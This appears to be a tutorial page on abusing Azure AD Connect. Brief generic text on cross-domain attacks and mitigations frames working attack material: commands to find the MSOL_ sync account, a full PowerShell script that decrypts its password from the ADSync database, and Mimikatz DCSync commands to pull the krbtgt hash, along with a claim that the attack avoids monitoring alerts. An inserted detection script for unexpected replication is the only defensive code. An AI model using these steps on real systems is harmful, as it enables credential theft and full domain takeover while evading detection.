Introduction to Cross Domain Attacks

Cross domain attacks are a significant threat in today’s interconnected digital environment. These attacks exploit the trust relationships between different internet domains to gain unauthorized access to sensitive information or services. With the increasing use of cloud solutions, such as Azure Active Directory (Azure AD), understanding and mitigating these attacks has become essential for maintaining robust security.

How Azure AD Integration Works

Azure AD is a comprehensive identity and access management solution for Microsoft’s Azure cloud services. It enables users to access various resources with a single set of credentials, facilitating seamless and secure connections across different domains. However, the integration of multiple domains introduces unique vulnerabilities that can be exploited if not managed properly.

Common Cross Domain Attack Techniques

Several techniques can be employed in cross domain attacks, such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and security misconfigurations. These techniques can be used to abuse legitimate credentials and tokens issued by Azure AD in order to reach domains or applications the user is not authorized for.

Mitigation Strategies

To protect against cross domain attacks, it is crucial to implement several mitigation strategies. These include regularly updating and patching systems, using strong authentication protocols, and regularly reviewing and auditing access controls. Specifically for Azure AD, implementing conditional access policies and Multi-Factor Authentication (MFA) can significantly reduce the risk of these attacks.

Methodology

  1. Enumerate the user accounts that carry the MSOL_ identity (the AD Connect service account).
  2. Start a process with the privileges of that user.
  3. Execute the adconnect.ps1 script, which returns the credentials of that user.
  4. Connect using runas and perform a DCSync attack.

PowerShell

1. Enumerate the PHS account and server where AD Connect is installed

# Powerview
Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

# AD Module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl

2. Dump the creds of the user and log on

With administrative privileges, running adconnect.ps1 extracts the credentials of the MSOL_ account used by AD Connect in clear text. Note: the adconnect.ps1 script runs powershell.exe, so verbose logs (such as transcripts) will be generated.

# Adconnect
. .\adconnect.ps1
adconnect

# Runas that user
runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd

3. Execute the DCSync attack

Please note that because AD Connect synchronizes hashes every two minutes, in an enterprise environment the MSOL_ account will be excluded from tools like MDI (Microsoft Defender for Identity). This will allow us to run DCSync without any alerts!

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

Invoke-Mimikatz -Command '"lsadump::dcsync /user:techcorp\krbtgt /domain:techcorp.local"'
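The exclusion from monitoring claimed above is exactly the gap a defender should close: replication by an MSOL_ account is only expected from the AD Connect server itself. The following is an added example, not code from the original page: Python detection logic that joins Security events 4662 (directory access carrying DS-Replication-Get-Changes rights) to 4624 logon events by Logon ID, and flags replication by an MSOL_ account from any other host, or by any account that is not a domain controller. The AD Connect server address 10.0.0.25 and the sample records are constructed assumptions.

```python
import re
# Control-access-right GUIDs that show up in the 4662 "Properties" field for replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Assumption: only the AD Connect server should replicate with the MSOL_ account.
ADCONNECT_HOSTS = {"10.0.0.25"}  # constructed address, not from the page
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

def find_dcsync(events, adconnect_hosts=ADCONNECT_HOSTS):
    """Return alert strings for unexpected replication requests; events are dicts with
    event_id, account, logon_id and either properties (4662) or ip (4624)."""
    # Join each 4662 to the 4624 logon event with the same Logon ID to learn the source IP.
    logon_ip = {e["logon_id"]: e["ip"] for e in events if e["event_id"] == 4624}
    alerts = []
    for e in events:
        if e["event_id"] != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e["properties"])}
        if not guids & REPLICATION_GUIDS:
            continue  # ordinary directory access, not replication
        account, ip = e["account"], logon_ip.get(e["logon_id"], "unknown")
        if account.endswith("$"):
            continue  # domain controller computer accounts replicate by design
        if account.upper().startswith("MSOL_"):
            if ip not in adconnect_hosts:
                alerts.append(f"MSOL_ replication from unexpected host {ip} ({account})")
        else:
            alerts.append(f"replication by non-DC account {account} from {ip}")
    return alerts

# Constructed sample events (not real logs); the MSOL_ name matches the page's lab.
SAMPLE_EVENTS = [
    {"event_id": 4624, "account": "MSOL_16fb75d0227d", "logon_id": "0x3e7a1", "ip": "10.0.0.25"},
    {"event_id": 4662, "account": "MSOL_16fb75d0227d", "logon_id": "0x3e7a1",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"event_id": 4624, "account": "MSOL_16fb75d0227d", "logon_id": "0x5f2c0", "ip": "10.0.0.77"},
    {"event_id": 4662, "account": "MSOL_16fb75d0227d", "logon_id": "0x5f2c0",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"event_id": 4662, "account": "DC01$", "logon_id": "0x1a2b",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"event_id": 4662, "account": "jdoe", "logon_id": "0x9c4d",
     "properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # non-replication property read
]

if __name__ == "__main__":
    for line in find_dcsync(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Only the second MSOL_ request (source 10.0.0.77, not the AD Connect server) is reported; the first is the legitimate sync, the DC is skipped, and the non-replication read is ignored.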

Abusing Azure AD Connect

Run the following script (the AD Connect credential extraction POC by @_xpn_):

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

# Connect to the local ADSync database (the LocalDB connection string is kept as an alternative)
#$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()

# Read the key set identifiers that protect the stored configuration
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Read the AD management agent's configuration and its encrypted section
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Load the AD Sync KeyManager from mcrypt.dll and decrypt the configuration with the stored key set
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Pull the domain, user name and password out of the configuration XML
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

Conclusion

Cross domain attacks pose a serious threat to any organization relying on integrated cloud services. Thus, a thorough understanding of these threats and the implementation of robust mitigation strategies are vital for maintaining security.

With Azure AD integration, safeguarding sensitive information requires diligent monitoring and proactive security measures.